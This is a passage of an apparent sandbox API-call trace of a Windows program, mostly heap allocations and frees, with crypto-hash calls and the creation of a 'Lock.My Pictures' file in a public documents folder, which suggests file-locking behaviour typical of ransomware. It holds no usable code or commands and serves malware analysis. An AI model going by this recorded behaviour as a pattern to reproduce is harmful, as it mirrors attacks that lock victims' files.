(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.420] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.420] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.420] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.422] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.423] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.431] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0267.431] GetLastError () returned 0x5 [0267.431] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0267.431] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.431] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.432] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Pictures" (normalized: "c:\\users\\public\\documents\\lock.my pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0267.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.433] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0267.433] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 